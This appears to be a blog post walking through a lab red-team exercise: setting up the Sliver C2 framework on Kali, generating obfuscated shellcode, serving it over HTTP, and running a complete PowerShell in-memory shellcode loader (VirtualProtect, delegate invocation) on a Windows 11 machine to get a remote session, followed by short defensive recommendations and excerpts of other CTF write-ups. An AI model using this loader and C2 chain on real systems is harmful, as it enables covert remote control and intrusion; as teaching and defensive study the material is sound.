SLIVER C&C

 

 SLIVER


This report documents the procedure for gaining initial access to a simulated Windows 11 target machine using the Sliver C2 framework and a PowerShell in-memory injection technique as part of an ethical penetration testing exercise.

First of all, System Update we have to execute this command which is  apt update -y (Ensured all necessary tools and packages were up-to-date) as you can see below.

┌──(root㉿kali)-[/home/luis]
└─# apt update -y
Des:1 http://kali.download/kali kali-rolling InRelease [34,0 kB]
Des:2 http://kali.download/kali kali-rolling/main amd64 Packages [21,0 MB]
Des:3 http://kali.download/kali kali-rolling/main amd64 Contents (deb) [50,6 MB]
Des:4 http://kali.download/kali kali-rolling/contrib amd64 Packages [119 kB]
Des:5 http://kali.download/kali kali-rolling/contrib amd64 Contents (deb) [326 kB]
Des:6 http://kali.download/kali kali-rolling/non-free amd64 Packages [201 kB]
Des:7 http://kali.download/kali kali-rolling/non-free amd64 Contents (deb) [911 kB]
Des:8 http://kali.download/kali kali-rolling/non-free-firmware amd64 Packages [11,3 kB]
Des:9 http://kali.download/kali kali-rolling/non-free-firmware amd64 Contents (deb) [28,4 kB]
Descargados 73,3 MB en 16s (4.675 kB/s)                                                                    
Se pueden actualizar 782 paquetes. Ejecute «apt list --upgradable» para verlos.

In addition, we have to install Sliver Installation with this command which is sudo apt install sliver -y (Installed the C2 framework and its cross-compilation dependencies, primarily mingw-w64.) as you can see below.                                                                                            

┌──(root㉿kali)-[/home/luis]
└─# sudo apt install sliver -y
Los paquetes indicados a continuación se instalaron de forma automática y ya no son necesarios.
  kde-style-oxygen-qt6  libhdf4-0-alt            libsframe1         libvpx9                            python3-wheel-whl
  libgdata-common       liboxygenstyle6-6        libsigsegv2        linux-image-6.12.25-amd64
  libgdata22            liboxygenstyleconfig6-6  libsoup-2.4-1      python3-packaging-whl
  libgeos3.13.1         libqt5ct-common1.8       libsoup2.4-common  python3-pyinstaller-hooks-contrib
Utilice «sudo apt autoremove» para eliminarlos.

Installing:
  sliver

Installing dependencies:
  binutils-mingw-w64         g++-mingw-w64-x86-64        gcc-mingw-w64-i686-posix-runtime
  binutils-mingw-w64-ucrt64  g++-mingw-w64-x86-64-posix  gcc-mingw-w64-x86-64
  g++-mingw-w64              g++-mingw-w64-x86-64-win32  gcc-mingw-w64-x86-64-posix
  g++-mingw-w64-i686         gcc-mingw-w64               gcc-mingw-w64-x86-64-posix-runtime
  g++-mingw-w64-i686-posix   gcc-mingw-w64-i686          mingw-w64
  g++-mingw-w64-i686-win32   gcc-mingw-w64-i686-posix

Paquetes sugeridos:
  gcc-14-locales

Summary:
  Upgrading: 0, Installing: 18, Removing: 0, Not Upgrading: 782
  Download size: 289 MB
  Space needed: 910 MB / 39,5 GB available

Des:1 http://http.kali.org/kali kali-rolling/main amd64 binutils-mingw-w64-ucrt64 amd64 2.44-3+12+b1 [3.475 kB]
Des:2 http://http.kali.org/kali kali-rolling/main amd64 binutils-mingw-w64 all 2.43.1-5+12 [149 kB]
Des:3 http://http.kali.org/kali kali-rolling/main amd64 gcc-mingw-w64-i686-posix-runtime amd64 14.2.0-19+27+b1 [12,3 MB]
Des:12 http://http.kali.org/kali kali-rolling/main amd64 g++-mingw-w64-x86-64 all 14.2.0-17+27 [193 kB]
Des:4 http://http.kali.org/kali kali-rolling/main amd64 gcc-mingw-w64-i686-posix amd64 14.2.0-19+27+b1 [37,2 MB]
Des:16 http://http.kali.org/kali kali-rolling/main amd64 gcc-mingw-w64 all 14.2.0-17+27 [193 kB]        
Des:5 http://http.kali.org/kali kali-rolling/main amd64 g++-mingw-w64-i686-posix amd64 14.2.0-19+27+b1 [15,0 MB]
Des:6 http://http.kali.org/kali kali-rolling/main amd64 g++-mingw-w64-i686-win32 amd64 14.2.0-19+27+b1 [15,0 MB]
Des:7 http://http.kali.org/kali kali-rolling/main amd64 g++-mingw-w64-i686 all 14.2.0-17+27 [193 kB]
Des:8 http://http.kali.org/kali kali-rolling/main amd64 gcc-mingw-w64-x86-64-posix-runtime amd64 14.2.0-19+27+b1 [13,0 MB]
Des:9 http://http.kali.org/kali kali-rolling/main amd64 gcc-mingw-w64-x86-64-posix amd64 14.2.0-19+27+b1 [37,6 MB]
Des:10 http://http.kali.org/kali kali-rolling/main amd64 g++-mingw-w64-x86-64-posix amd64 14.2.0-19+27+b1 [15,3 MB]
Des:11 http://http.kali.org/kali kali-rolling/main amd64 g++-mingw-w64-x86-64-win32 amd64 14.2.0-19+27+b1 [15,3 MB]
Des:13 http://http.kali.org/kali kali-rolling/main amd64 g++-mingw-w64 all 14.2.0-17+27 [193 kB]
Des:14 http://http.kali.org/kali kali-rolling/main amd64 gcc-mingw-w64-i686 all 14.2.0-17+27 [193 kB]
Des:15 http://http.kali.org/kali kali-rolling/main amd64 gcc-mingw-w64-x86-64 all 14.2.0-17+27 [193 kB]
Des:17 http://kali.download/kali kali-rolling/main amd64 mingw-w64 all 12.0.0-5 [11,3 kB]
Des:18 http://kali.download/kali kali-rolling/main amd64 sliver amd64 1.5.42-0kali1 [124 MB]
Descargados 289 MB en 9s (32,3 MB/s)                                                                                         
Seleccionando el paquete binutils-mingw-w64-ucrt64 previamente no seleccionado.
(Leyendo la base de datos ... 572169 ficheros o directorios instalados actualmente.)
Preparando para desempaquetar .../00-binutils-mingw-w64-ucrt64_2.44-3+12+b1_amd64.deb ...
Desempaquetando binutils-mingw-w64-ucrt64 (2.44-3+12+b1) ...
Seleccionando el paquete binutils-mingw-w64 previamente no seleccionado.
Preparando para desempaquetar .../01-binutils-mingw-w64_2.43.1-5+12_all.deb ...
Desempaquetando binutils-mingw-w64 (2.43.1-5+12) ...
Seleccionando el paquete gcc-mingw-w64-i686-posix-runtime previamente no seleccionado.
Preparando para desempaquetar .../02-gcc-mingw-w64-i686-posix-runtime_14.2.0-19+27+b1_amd64.deb ...
Desempaquetando gcc-mingw-w64-i686-posix-runtime (14.2.0-19+27+b1) ...
Seleccionando el paquete gcc-mingw-w64-i686-posix previamente no seleccionado.
Preparando para desempaquetar .../03-gcc-mingw-w64-i686-posix_14.2.0-19+27+b1_amd64.deb ...
Desempaquetando gcc-mingw-w64-i686-posix (14.2.0-19+27+b1) ...
Seleccionando el paquete g++-mingw-w64-i686-posix previamente no seleccionado.
Preparando para desempaquetar .../04-g++-mingw-w64-i686-posix_14.2.0-19+27+b1_amd64.deb ...
Desempaquetando g++-mingw-w64-i686-posix (14.2.0-19+27+b1) ...
Seleccionando el paquete g++-mingw-w64-i686-win32 previamente no seleccionado.
Preparando para desempaquetar .../05-g++-mingw-w64-i686-win32_14.2.0-19+27+b1_amd64.deb ...
Desempaquetando g++-mingw-w64-i686-win32 (14.2.0-19+27+b1) ...
Seleccionando el paquete g++-mingw-w64-i686 previamente no seleccionado.
Preparando para desempaquetar .../06-g++-mingw-w64-i686_14.2.0-17+27_all.deb ...
Desempaquetando g++-mingw-w64-i686 (14.2.0-17+27) ...
Seleccionando el paquete gcc-mingw-w64-x86-64-posix-runtime previamente no seleccionado.
Preparando para desempaquetar .../07-gcc-mingw-w64-x86-64-posix-runtime_14.2.0-19+27+b1_amd64.deb ...
Desempaquetando gcc-mingw-w64-x86-64-posix-runtime (14.2.0-19+27+b1) ...
Seleccionando el paquete gcc-mingw-w64-x86-64-posix previamente no seleccionado.
Preparando para desempaquetar .../08-gcc-mingw-w64-x86-64-posix_14.2.0-19+27+b1_amd64.deb ...
Desempaquetando gcc-mingw-w64-x86-64-posix (14.2.0-19+27+b1) ...
Seleccionando el paquete g++-mingw-w64-x86-64-posix previamente no seleccionado.
Preparando para desempaquetar .../09-g++-mingw-w64-x86-64-posix_14.2.0-19+27+b1_amd64.deb ...
Desempaquetando g++-mingw-w64-x86-64-posix (14.2.0-19+27+b1) ...
Seleccionando el paquete g++-mingw-w64-x86-64-win32 previamente no seleccionado.
Preparando para desempaquetar .../10-g++-mingw-w64-x86-64-win32_14.2.0-19+27+b1_amd64.deb ...
Desempaquetando g++-mingw-w64-x86-64-win32 (14.2.0-19+27+b1) ...
Seleccionando el paquete g++-mingw-w64-x86-64 previamente no seleccionado.
Preparando para desempaquetar .../11-g++-mingw-w64-x86-64_14.2.0-17+27_all.deb ...
Desempaquetando g++-mingw-w64-x86-64 (14.2.0-17+27) ...
Seleccionando el paquete g++-mingw-w64 previamente no seleccionado.
Preparando para desempaquetar .../12-g++-mingw-w64_14.2.0-17+27_all.deb ...
Desempaquetando g++-mingw-w64 (14.2.0-17+27) ...
Seleccionando el paquete gcc-mingw-w64-i686 previamente no seleccionado.
Preparando para desempaquetar .../13-gcc-mingw-w64-i686_14.2.0-17+27_all.deb ...
Desempaquetando gcc-mingw-w64-i686 (14.2.0-17+27) ...
Seleccionando el paquete gcc-mingw-w64-x86-64 previamente no seleccionado.
Preparando para desempaquetar .../14-gcc-mingw-w64-x86-64_14.2.0-17+27_all.deb ...
Desempaquetando gcc-mingw-w64-x86-64 (14.2.0-17+27) ...
Seleccionando el paquete gcc-mingw-w64 previamente no seleccionado.
Preparando para desempaquetar .../15-gcc-mingw-w64_14.2.0-17+27_all.deb ...
Desempaquetando gcc-mingw-w64 (14.2.0-17+27) ...
Seleccionando el paquete mingw-w64 previamente no seleccionado.
Preparando para desempaquetar .../16-mingw-w64_12.0.0-5_all.deb ...
Desempaquetando mingw-w64 (12.0.0-5) ...
Seleccionando el paquete sliver previamente no seleccionado.
Preparando para desempaquetar .../17-sliver_1.5.42-0kali1_amd64.deb ...
Desempaquetando sliver (1.5.42-0kali1) ...
Configurando g++-mingw-w64-i686-win32 (14.2.0-19+27+b1) ...
update-alternatives: utilizando /usr/bin/i686-w64-mingw32-g++-win32 para proveer /usr/bin/i686-w64-mingw32-g++ (i686-w64-mingw
32-g++) en modo automático
Configurando g++-mingw-w64-x86-64-win32 (14.2.0-19+27+b1) ...
update-alternatives: utilizando /usr/bin/x86_64-w64-mingw32-g++-win32 para proveer /usr/bin/x86_64-w64-mingw32-g++ (x86_64-w64
-mingw32-g++) en modo automático
Configurando gcc-mingw-w64-x86-64-posix-runtime (14.2.0-19+27+b1) ...
Configurando gcc-mingw-w64-x86-64-posix (14.2.0-19+27+b1) ...
Configurando gcc-mingw-w64-i686-posix-runtime (14.2.0-19+27+b1) ...
Configurando gcc-mingw-w64-x86-64 (14.2.0-17+27) ...
Configurando binutils-mingw-w64-ucrt64 (2.44-3+12+b1) ...
Configurando sliver (1.5.42-0kali1) ...
Configurando gcc-mingw-w64-i686-posix (14.2.0-19+27+b1) ...
Configurando g++-mingw-w64-x86-64-posix (14.2.0-19+27+b1) ...
Configurando gcc-mingw-w64-i686 (14.2.0-17+27) ...
Configurando g++-mingw-w64-x86-64 (14.2.0-17+27) ...
Configurando binutils-mingw-w64 (2.43.1-5+12) ...
Configurando gcc-mingw-w64 (14.2.0-17+27) ...
Configurando g++-mingw-w64-i686-posix (14.2.0-19+27+b1) ...
Configurando g++-mingw-w64-i686 (14.2.0-17+27) ...
Configurando g++-mingw-w64 (14.2.0-17+27) ...
Configurando mingw-w64 (12.0.0-5) ...
Procesando disparadores para libc-bin (2.41-12) ...
Procesando disparadores para man-db (2.13.1-1) ...
Procesando disparadores para kali-menu (2025.3.0) ...
Scanning processes...                                                                                                         
Scanning linux images...                                                                                                      

Running kernel seems to be up-to-date.

No services need to be restarted.

No containers need to be restarted.

No user sessions are running outdated binaries.

No VM guests are running outdated hypervisor (qemu) binaries on this host.

But before, we should know our IP Address which is 192.168.88.6 as you can see below:

┌──(luis㉿kali)-[~]
└─$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 1000
    link/ether 08:00:27:4d:8a:0f brd ff:ff:ff:ff:ff:ff
    inet 192.168.88.6/24 brd 192.168.88.255 scope global dynamic noprefixroute eth0
       valid_lft 6987sec preferred_lft 6987sec
    inet6 fd00::93ca:187e:41e3:abd6/64 scope global temporary dynamic
       valid_lft 26sec preferred_lft 26sec
    inet6 fd00::a00:27ff:fe4d:8a0f/64 scope global dynamic mngtmpaddr noprefixroute
       valid_lft 26sec preferred_lft 26sec
    inet6 fe80::a00:27ff:fe4d:8a0f/64 scope link noprefixroute
       valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
    link/ether 02:42:77:9b:cb:94 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever    

Now, we are going to deploying sliver server which we will be able to obtain shell.         

┌──(root㉿kali)-[/home/luis]
└─# sliver-server

.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'

All hackers gain improvise
[*] Server v1.5.42 - kali
[*] Welcome to the sliver shell, please type 'help' for options

[*] Check for updates with the 'update' command

Now, we must create shellcode as you can see below with our ip and port where we will receive the shell.

[server] sliver > generate --mtls 192.168.88.6:443 --format shellcode

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 1m4s
[*] Encoding shellcode with shikata ga nai ... success!
[*] Implant saved to /home/luis/VIVID_LAPAROSCOPE.bin

Now, ls command confirm has been created to current directory as you can see below.
┌──(root㉿kali)-[/home/luis]
└─# ls
CVE-2025-32463_chwoot  Escritorio    hola            microchoft.txt  password             Plantillas   reverse_shell.php  silver.txt   text.php               vulnyx_shop.txt
Descargas              friendly.txt  Imágenes        Música          password_bloodhound  prueba.elf   secretito.txt      SMS-Bomber   users1.txt             Win7Blue
docker-compose.yml     galeria.txt   jamm.txt        nc.exe          passwords.txt        Público      secretito.zip      spoofy       Vídeos
Documentos             hash          LinkedInDumper  ofuskeit.txt    persistence.txt      reverse.php  sedition.txt       ssh2john.py  VIVID_LAPAROSCOPE.bin

Now, we have to change the name as you can see below with the next command:

  1. mv VIVID_LAPAROSCOPE.bin shellcode.bin
┌──(root㉿kali)-[/home/luis]
└─# mv VIVID_LAPAROSCOPE.bin shellcode.bin
                                                                                                                                                                         Now, ls command confirm has been changed to current directory as you can see below.        

┌──(root㉿kali)-[/home/luis]
└─# ls
CVE-2025-32463_chwoot  Escritorio    hola            microchoft.txt  password             Plantillas   reverse_shell.php  shellcode.bin  ssh2john.py  vulnyx_shop.txt
Descargas              friendly.txt  Imágenes        Música          password_bloodhound  prueba.elf   secretito.txt      silver.txt     text.php     Win7Blue
docker-compose.yml     galeria.txt   jamm.txt        nc.exe          passwords.txt        Público      secretito.zip      SMS-Bomber     users1.txt
Documentos             hash          LinkedInDumper  ofuskeit.txt    persistence.txt      reverse.php  sedition.txt       spoofy         Vídeos

Now, we have to open python server as if we ware the victim machine as you can see below.
Used a simple HTTP server on port 5000 to host the shellcode.bin file, simulating the delivery of the malicious payload to the victim machine IP address 192.168.88.3.
┌──(root㉿kali)-[/home/luis]
└─# python3 -m http.server 5000       
Serving HTTP on 0.0.0.0 port 5000 (http://0.0.0.0:5000/) ...
192.168.88.3 - - [30/Sep/2025 18:41:31] "GET / HTTP/1.1" 200 -
192.168.88.3 - - [30/Sep/2025 18:41:31] code 404, message File not found
192.168.88.3 - - [30/Sep/2025 18:41:31] "GET /favicon.ico HTTP/1.1" 404 -
192.168.88.3 - - [30/Sep/2025 18:41:53] "GET /shellcode.bin HTTP/1.1" 200 -

Now we have to open port which will be 443 as you can see below.
[server] sliver > mtls --lhost 192.168.88.6 --lport 443

[*] Starting mTLS listener ...

[*] Successfully started job #1
Please select a session or beacon via `use`

[server] sliver > mtls --lhost 192.168.88.6 --lport 443

[*] Starting mTLS listener ...

In the victim machine we have to download the file as you can see in the picture below:


IMPORTANT THIS CODE HAVE TO BE EXECUTED BY THE VICTIM

#Ruta del shellcode (ajústala si es necesario)

$sc =

[System.IO.File]::ReadAllBytes("C:\Users\Luis\Downloads\shellcode.bin")

# Reservar memoria

$ptr =

[System.Runtime.InteropServices.Marshal]::AllocHGlobal($sc.Length)

# Copiar shellcode a memoria

[System.Runtime.InteropServices.Marshal]::Copy($sc, 0, $ptr, $sc.Length)

# Cambiar permisos de memoria a ejecutable

$oldProtect = 0

Add-Type @"

using System;

using System.Runtime.InteropServices;

public class Kernel32 {

[DllImport("kernel32.dll")]

public static extern bool VirtualProtect(IntPtr lpAddress, UInt32

dwSize, UInt32 flNewProtect, out UInt32 lpflOldProtect);

}

"@ | Out-Null

[Kernel32]::VirtualProtect($ptr, $sc.Length, 0x40, [ref]$oldProtect) |

Out-Null

# Crear delegado para ejecutar shellcode

$actionType = [System.Action]

$delegate =

[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(

$ptr, $actionType)

# Ejecutar directamente (sin hilos)

$delegate.Invoke() 


Gotcha! when we execute the script we will get the shell as you can see below.

PS C:\Users\Luis\Desktop> C:\Users\Luis\Desktop\script.ps1

[*] Successfully started job #1

[*] Session d372d112 VIVID_LAPAROSCOPE - 192.168.88.3:1315 (DESKTOP-Q2TNC4F) - windows/amd64 - Tue, 30 Sep 2025 18:46:20 CEST

In addition, we can see the alive sessions which there is 1 in our attacker machine as you can see below.

[server] sliver > sessions

 ID         Transport   Remote Address      Hostname          Username   Operating System   Health  
========== =========== =================== ================= ========== ================== =========
 d372d112   mtls        192.168.88.3:1315   DESKTOP-Q2TNC4F   Luis       windows/amd64      [ALIVE]

[server] sliver > sessions -i d372d112

[*] Active session VIVID_LAPAROSCOPE (d372d112)
[*] Active session VIVID_LAPAROSCOPE (d372d112)

Now, we can list the files, folders etc as you can see below.
[server] sliver (VIVID_LAPAROSCOPE) > ls

C:\Users\Luis\Desktop (35 items, 1.8 GiB)
=========================================
drwxrwxrwx  acreditaciones máster de hacking ético                       <dir>       Tue Mar 21 21:20:06 +0200 2023
drwxrwxrwx  active directory                                             <dir>       Thu Jul 31 16:32:29 +0200 2025
drwxrwxrwx  Azure_Courses                                                <dir>       Thu Mar 06 10:48:50 +0200 2025
drwxrwxrwx  b1 Listening                                                 <dir>       Tue Jan 28 18:31:19 +0200 2025
drwxrwxrwx  B1PET                                                        <dir>       Tue Apr 29 15:45:07 +0200 2025
drwxrwxrwx  b1Trinity                                                    <dir>       Mon May 05 16:24:08 +0200 2025
dr-xr-xr-x  ceh                                                          <dir>       Wed Jun 19 18:42:20 +0200 2024
drwxrwxrwx  CEHv12                                                       <dir>       Tue Feb 25 19:17:08 +0200 2025
-rw-rw-rw-  Configurador_FNMT_5.0.3_64bits.exe                           43.8 MiB    Wed Sep 24 19:31:04 +0200 2025
dr-xr-xr-x  Curriculum vitae                                             <dir>       Sat Sep 27 09:53:23 +0200 2025
drwxrwxrwx  curso python                                                 <dir>       Sat May 24 11:55:17 +0200 2025
drwxrwxrwx  cyberlabs                                                    <dir>       Tue Sep 23 17:04:58 +0200 2025
-rw-rw-rw-  desktop.ini                                                  282 B       Tue Jul 22 19:51:19 +0200 2025
-rw-rw-rw-  DuckDuckGo.lnk                                               2.3 KiB     Sun Apr 13 18:05:46 +0200 2025
-rw-rw-rw-  Ethernet - Acceso directo (2).lnk                            368 B       Sun Feb 04 13:40:05 +0200 2024
-rw-rw-rw-  Ethernet - Acceso directo.lnk                                358 B       Sun May 29 17:25:07 +0200 2022
-rw-rw-rw-  Ethernet - Shortcut.lnk                                      358 B       Sat Jan 20 13:03:17 +0200 2024
-rw-rw-rw-  Ethernet 3 - Acceso directo.lnk                              368 B       Sun Feb 04 13:40:02 +0200 2024
drwxrwxrwx  Examen Hacking 2ºEvaluación                                  <dir>       Tue Mar 21 12:05:59 +0200 2023
drwxrwxrwx  Expert Ethical Hacking                                       <dir>       Tue Jan 28 18:34:25 +0200 2025
-rw-rw-rw-  GUÍA TÉCNICA DE CADENA DE CUSTODIA DE EVIDENCIA DIGITAL.pdf  1.4 MiB     Wed Apr 12 11:17:40 +0200 2023
drwxrwxrwx  hacking                                                      <dir>       Tue Sep 16 15:41:19 +0200 2025
drwxrwxrwx  iCloud Photos                                                <dir>       Sun Jul 20 11:36:06 +0200 2025
-rw-rw-rw-  iCloud Photos.zip                                            1006.8 MiB  Sun Jul 20 11:26:49 +0200 2025
drwxrwxrwx  ISOS                                                         <dir>       Tue Sep 16 11:05:06 +0200 2025
drwxrwxrwx  kinomakino_Courses                                           <dir>       Tue Sep 09 16:45:14 +0200 2025
-rw-rw-rw-  metasploitable-linux-2.0.0.zip                               825.0 MiB   Thu Feb 29 11:40:12 +0200 2024
drwxrwxrwx  Normativa                                                    <dir>       Tue May 16 10:20:34 +0200 2023
drwxrwxrwx  Python                                                       <dir>       Fri Jan 26 12:13:47 +0200 2024
-rw-rw-rw-  script.ps1                                                   972 B       Tue Sep 30 18:44:26 +0200 2025
drwxrwxrwx  Scripts powershell                                           <dir>       Wed Dec 04 18:18:49 +0200 2024
drwxrwxrwx  TRABAJO FIN CURSO                                            <dir>       Mon Dec 18 20:53:31 +0200 2023
-rw-rw-rw-  vEthernet (Default Switch) - Acceso directo.lnk              390 B       Sun Feb 04 13:40:06 +0200 2024
-rw-rw-rw-  Wi-Fi - Acceso directo.lnk                                   398 B       Sun May 29 17:25:05 +0200 2022
-rw-rw-rw-  Zoom Workplace.lnk                                           1.9 KiB     Sat Sep 27 11:05:55 +0200 2025

[server] sliver (VIVID_LAPAROSCOPE) > [server] sliver (VIVID_LAPAROSCOPE) > mkdir pepe

[*] C:\Users\Luis\Desktop\pepe

As we are inside vitim machine we can create folder as you can see below.

[server] sliver (VIVID_LAPAROSCOPE) > mkdir pepe

[*] C:\Users\Luis\Desktop\pepe

[server] sliver (VIVID_LAPAROSCOPE) > ls

C:\Users\Luis\Desktop (36 items, 1.8 GiB)
=========================================
drwxrwxrwx  acreditaciones máster de hacking ético                       <dir>       Tue Mar 21 21:20:06 +0200 2023
drwxrwxrwx  active directory                                             <dir>       Thu Jul 31 16:32:29 +0200 2025
drwxrwxrwx  Azure_Courses                                                <dir>       Thu Mar 06 10:48:50 +0200 2025
drwxrwxrwx  b1 Listening                                                 <dir>       Tue Jan 28 18:31:19 +0200 2025
drwxrwxrwx  B1PET                                                        <dir>       Tue Apr 29 15:45:07 +0200 2025
drwxrwxrwx  b1Trinity                                                    <dir>       Mon May 05 16:24:08 +0200 2025
dr-xr-xr-x  ceh                                                          <dir>       Wed Jun 19 18:42:20 +0200 2024
drwxrwxrwx  CEHv12                                                       <dir>       Tue Feb 25 19:17:08 +0200 2025
-rw-rw-rw-  Configurador_FNMT_5.0.3_64bits.exe                           43.8 MiB    Wed Sep 24 19:31:04 +0200 2025
dr-xr-xr-x  Curriculum vitae                                             <dir>       Sat Sep 27 09:53:23 +0200 2025
drwxrwxrwx  curso python                                                 <dir>       Sat May 24 11:55:17 +0200 2025
drwxrwxrwx  cyberlabs                                                    <dir>       Tue Sep 23 17:04:58 +0200 2025
-rw-rw-rw-  desktop.ini                                                  282 B       Tue Jul 22 19:51:19 +0200 2025
-rw-rw-rw-  DuckDuckGo.lnk                                               2.3 KiB     Sun Apr 13 18:05:46 +0200 2025
-rw-rw-rw-  Ethernet - Acceso directo (2).lnk                            368 B       Sun Feb 04 13:40:05 +0200 2024
-rw-rw-rw-  Ethernet - Acceso directo.lnk                                358 B       Sun May 29 17:25:07 +0200 2022
-rw-rw-rw-  Ethernet - Shortcut.lnk                                      358 B       Sat Jan 20 13:03:17 +0200 2024
-rw-rw-rw-  Ethernet 3 - Acceso directo.lnk                              368 B       Sun Feb 04 13:40:02 +0200 2024
drwxrwxrwx  Examen Hacking 2ºEvaluación                                  <dir>       Tue Mar 21 12:05:59 +0200 2023
drwxrwxrwx  Expert Ethical Hacking                                       <dir>       Tue Jan 28 18:34:25 +0200 2025
-rw-rw-rw-  GUÍA TÉCNICA DE CADENA DE CUSTODIA DE EVIDENCIA DIGITAL.pdf  1.4 MiB     Wed Apr 12 11:17:40 +0200 2023
drwxrwxrwx  hacking                                                      <dir>       Tue Sep 16 15:41:19 +0200 2025
drwxrwxrwx  iCloud Photos                                                <dir>       Sun Jul 20 11:36:06 +0200 2025
-rw-rw-rw-  iCloud Photos.zip                                            1006.8 MiB  Sun Jul 20 11:26:49 +0200 2025
drwxrwxrwx  ISOS                                                         <dir>       Tue Sep 16 11:05:06 +0200 2025
drwxrwxrwx  kinomakino_Courses                                           <dir>       Tue Sep 09 16:45:14 +0200 2025
-rw-rw-rw-  metasploitable-linux-2.0.0.zip                               825.0 MiB   Thu Feb 29 11:40:12 +0200 2024
drwxrwxrwx  Normativa                                                    <dir>       Tue May 16 10:20:34 +0200 2023
drwxrwxrwx  pepe                                                         <dir>       Tue Sep 30 18:51:36 +0200 2025
drwxrwxrwx  Python                                                       <dir>       Fri Jan 26 12:13:47 +0200 2024
-rw-rw-rw-  script.ps1                                                   972 B       Tue Sep 30 18:44:26 +0200 2025
drwxrwxrwx  Scripts powershell                                           <dir>       Wed Dec 04 18:18:49 +0200 2024
drwxrwxrwx  TRABAJO FIN CURSO                                            <dir>       Mon Dec 18 20:53:31 +0200 2023
-rw-rw-rw-  vEthernet (Default Switch) - Acceso directo.lnk              390 B       Sun Feb 04 13:40:06 +0200 2024
-rw-rw-rw-  Wi-Fi - Acceso directo.lnk                                   398 B       Sun May 29 17:25:05 +0200 2022
-rw-rw-rw-  Zoom Workplace.lnk                                           1.9 KiB     Sat Sep 27 11:05:55 +0200 2025  

This successful Red Team exercise highlights several areas where the target's defense could be improved:

  1. PowerShell Scripting: The use of PowerShell's in-memory execution is a powerful evasion technique. Security teams should implement PowerShell Logging (Module and Script Block Logging) to capture and analyze the malicious commands (AllocHGlobal, VirtualProtect) used for injection.

  2. Network Traffic Detection: Although mTLS traffic is encrypted, defenders should monitor for Command and Control (C2) traffic patterns, such as unusually frequent or small-sized outgoing connections on port 443 that are characteristic of C2 beacons.

  3. Endpoint Detection and Response (EDR): The most effective defense against this attack is a modern EDR solution that can detect API Hooking and suspicious memory allocation attempts (VirtualProtect changing memory permissions to executable) in real-time.

  4. Application Control: Implementing robust Application Whitelisting or Windows Defender Application Control (WDAC) could prevent unauthorized PowerShell scripts like script.ps1 from running in the first place.                                                     

Thank you very much for reading this article

I hope you liked and learned something new

This article has been done with ethical proposes

Good Hack

Comments

Post a Comment

Entradas Populares

INTERNAL

Image
 INTERNAL(TRYHACKME) First of all, let's go execute nmap command to identify alives ports and version with this host 192.168.88.6 as you can see below. Key open ports and services include: Web Servers: Port 80 (HTTP):  Running  Apache2 Ubuntu Default Page . It supports  OPTIONS ,  TRACE  (flagged as potentially risky),  GET ,  HEAD , and  POST  methods. The webpage title is " INTERNAL ". SSH Protocol Port 22 (SSH): Running Linux . ┌──(root㉿kali)-[/home/luis/Descargas] └─# nmap -n -Pn -p- --min-rate 5000 -sC 10.10.216.78 -vvv Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-07 12:06 CEST NSE: Loaded 126 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed Initiating SYN Stealth Scan at 12:06 Scanning 10.10.216.78 [65535 ports] Discove...
Read more »

TOR WEB BROWSER

Image
  TOR WEB BROWSER TOR INSTALLATION First of all; we're going to this link from the oficial webpage: https://www.torproject.org/es/download/   where we have to download this version our laptop, Windows and Linux but in my case I've had to download for Windows 10. When the program is installed we will press execute and we'll follow step by step:   We'll open and we'll see this image where you have to select the language and select ok to continue the instal l ation. In addition, we'll select the location wherever you want install the program, but in my case I prefer the default location and you'll able to select wherever you want. Now, we will be started the installation process and when it finished you will be able to see the picture below: TOR CONNECT If the process has been successful, you will be able to connect with the connect button which you can observe in both pictures below: ADD A BRIDGE ...
Read more »

activedirectory

Image
ACTIVEDIRECTORY (TRYHACKME) First of all, let’s go to execute nmap toolkit and we'll be able to start the enumeration of the ports as you can see below with this command: sudo nmap -n -Pn -p- --min-rate 5000 10.10.135.154 -vvv -sC -sV This revealed several open TCP ports with associated services, including: DNS (53),  HTTP  (80),  Kerberos (88),  RPC (135),  NetBIOS-SSN (139),  SMB (445),  RDP (3389),  WS-Management (5985)  LDAP (389, 636, 3268, 3269) Moreover, service and NSE script detection provided valuable information about the services running on these ports, such as IIS 10.0, Microsoft Windows Kerberos , Active Directory LDAP , and Microsoft Terminal Services . The SSL/TLS certificate information on port 3389 indicated the common name AttacktiveDirectory.spookysec.local, reinforcing the target as an Active Directory server. rdp-ntlm-info also provided details about the domain (THM-AD) and computer name (ATTACKTIVEDIREC) as you can se...
Read more »

PICKLE RICK

Image
  PICKLE RICK I'm going to realize the resolution of the machine Level Easy from Tryhackme called  Pickle Rick  which is a machine so easy to realize. First of all,  we can observe that in the picture bellow we have some inforamtion and I'm going to execute control +u  and we can see in the second picture below that we've obtained a  Username. I'm going to gathering information about machine and I have to enter in the Linux terminal and I must introduce this command which you canobserve in the picture below:   gobuster dir -u(url) http://10.10.99.188/ -w(password dictionary)  /usr/share/wordlist/dirb/common.txt -x (formato que quereos que busque) .txt*, .php, .login,  In this case, we can observe that scan has discovered this 4 webpages: /assests /denied.php /index.html /login.php /robots.txt Now, we can see such as the web page from /robots.txt   it seems the password in the picture below. Now, we've discovered this login web page...
Read more »

Metasploit Framework

Image
